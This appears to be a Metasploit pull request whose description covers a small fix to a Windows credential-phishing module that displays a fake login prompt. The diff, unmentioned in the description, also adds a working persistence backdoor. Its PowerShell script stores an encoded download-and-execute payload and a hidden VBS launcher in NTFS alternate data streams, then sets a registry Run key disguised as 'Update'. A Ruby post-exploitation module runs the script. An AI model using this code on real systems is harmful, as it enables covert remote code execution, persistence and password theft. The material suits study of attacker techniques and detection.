### PR TITLE
phish_windows_credentials XML output on Windows 8.1

### DIFF
--- a/data/post/powershell/Invoke-ADSBackdoor.ps1
+++ b/data/post/powershell/Invoke-ADSBackdoor.ps1
@@ -1,0 +1,27 @@
+function Invoke-ADSBackdoor{
+
+$TextfileName = [System.IO.Path]::GetRandomFileName() + ".txt"
+$textFile = $TextfileName -split '\.',([regex]::matches($TextfileName,"\.").count) -join ''
+$VBSfileName = [System.IO.Path]::GetRandomFileName() + ".vbs"
+$vbsFile = $VBSFileName -split '\.',([regex]::matches($VBSFileName,"\.").count) -join ''
+
+#Store Payload
+$payloadParameters = "IEX ((New-Object Net.WebClient).DownloadString('R{URL}')); #R{ARGUMENTS}"
+$encodedPayload = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($payloadParameters))
+$payload = "powershell.exe -ep Bypass -noexit -enc $encodedPayload"
+#Store VBS Wrapper
+$vbstext1 = "Dim objShell"
+$vbstext2 = "Set objShell = WScript.CreateObject(""WScript.Shell"")"
+$vbstext3 = "command = ""cmd /C for /f """"delims=,"""" %i in ($env:UserProfile\AppData:$textFile) do %i"""
+$vbstext4 = "objShell.Run command, 0"
+$vbstext5 = "Set objShell = Nothing"
+$vbText = $vbstext1 + ":" + $vbstext2 + ":" + $vbstext3 + ":" + $vbstext4 + ":" + $vbstext5
+#Create Alternate Data Streams for Payload and Wrapper
+$CreatePayloadADS = {cmd /C "echo $payload > $env:USERPROFILE\AppData:$textFile"}
+$CreateWrapperADS = {cmd /C "echo $vbtext > $env:USERPROFILE\AppData:$vbsFile"}
+Invoke-Command -ScriptBlock $CreatePayloadADS
+Invoke-Command -ScriptBlock $CreateWrapperADS
+#Persist in Registry
+new-itemproperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name Update -PropertyType String -Value "wscript.exe $env:USERPROFILE\AppData:$vbsFile" -Force
+Write-Host "Process Complete. Persistent key is located at HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\Update"
+}

--- a/data/post/powershell/Invoke-LoginPrompt.ps1
+++ b/data/post/powershell/Invoke-LoginPrompt.ps1
@@ -18,5 +18,5 @@ while($DS.ValidateCredentials("$full","$password") -ne $True){
     }
  $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password
  $output
- R{START_PROCESS}
+ #R{START_PROCESS}
 }

--- a/modules/post/windows/gather/phish_windows_credentials.rb
+++ b/modules/post/windows/gather/phish_windows_credentials.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
     else
        sdescription = description.gsub("{PROCESS_NAME}", process)
        psh_script2 = base_script.gsub("R{DESCRIPTION}", "#{sdescription}") << "Invoke-LoginPrompt"
-       psh_script = psh_script2.gsub("R{START_PROCESS}", "start-process \"#{path}\"")
+       psh_script = psh_script2.gsub("#R{START_PROCESS}", "start-process \"#{path}\"")
     end
     compressed_script = compress_script(psh_script)
     cmd_out, runnings_pids, open_channels = execute_script(compressed_script, datastore['TIMEOUT'])

--- a/modules/post/windows/manage/ads_backdoor.rb
+++ b/modules/post/windows/manage/ads_backdoor.rb
@@ -1,0 +1,61 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Post
+  include Msf::Post::Windows::Powershell
+  def initialize(info={})
+     super(update_info(info,
+         'Name'            => 'Alternate Data Stream Persistence',
+         'Description'     => 'This module is able to create persistence on a compromised host by using Alternate Data Streams. Tested on Windows 7.',
+         'License'         => MSF_LICENSE,
+         'Author'          => 'Matt Nelson (@enigma0x3)',
+         'References'      => [ 'URL', 'https://enigma0x3.wordpress.com/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/' ],
+         'Platform'        => [ 'win' ],
+         'Arch'            => [ 'x86', 'x64' ],
+         'SessionTypes'    => [ 'meterpreter'],
+        
+       ))
+ register_options(
+  [
+    OptString.new('URL', [ true, 'URL containing payload in the form of a Powershell Script' ]),
+    OptString.new('ARGUMENTS', [ false, 'Arguments for the Payload specified (if needed)' ]),
+  ], self.class)
+
+  end
+
+  # Function to run the Invoke-ADSBackdoor Powershell Script
+  def execute_invokeADSBackdoor_script(url,arguments)
+    base_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "Invoke-ADSBackdoor.ps1"))
+    if arguments.nil?
+       surl = url.gsub("{URL}",url)
+       psh_script1 = base_script.gsub("R{URL}", "#{surl}")
+       psh_script = psh_script1.gsub("#R{ARGUMENTS}", "") << "Invoke-ADSBackdoor"
+    else
+       surl = url.gsub("{URL)",url)
+       sarguments = arguments.gsub("{ARGUMENTS}",arguments)
+       psh_script1 = base_script.gsub("R{URL}", "#{surl}")
+       psh_script = psh_script1.gsub("#R{ARGUMENTS}", "#{sarguments}") << "Invoke-ADSBackdoor"
+    end
+    compressed_script = compress_script(psh_script)
+    cmd_out, open_channels = execute_script(compressed_script)
+  end
+
+  # Main Method
+  def run
+    url = datastore['URL']
+    arguments = datastore['ARGUMENTS']
+
+  case arguments
+  when nil
+    print_status("Creating ADS with Payload containing no arguments...")
+    execute_invokeADSBackdoor_script(url, nil)
+    print_status("ADS Created!")
+  else
+    print_status("Creating ADS with Payload and specified arguments...")
+    execute_invokeADSBackdoor_script(url, arguments)
+    print_status("ADS Created!")
+    end
+  end
+end


### PR DESCRIPTION
When running the Powershell phishing credential module on windows 8.1 without specifying a process, you get the XML below outputted. Sometimes, the XML takes over and you are unable to see the credentials.

This is because when you don't specify a process, it leaves "R{START_PROCESS}" in Invoke-LoginPrompt.ps1. I verified that this causes the unwanted output by commenting it out and running the module.

To fix this, you need to edit Invoke-LoginPrompt.ps1 and phish_windows_credentials.rb. The changes to each are here.
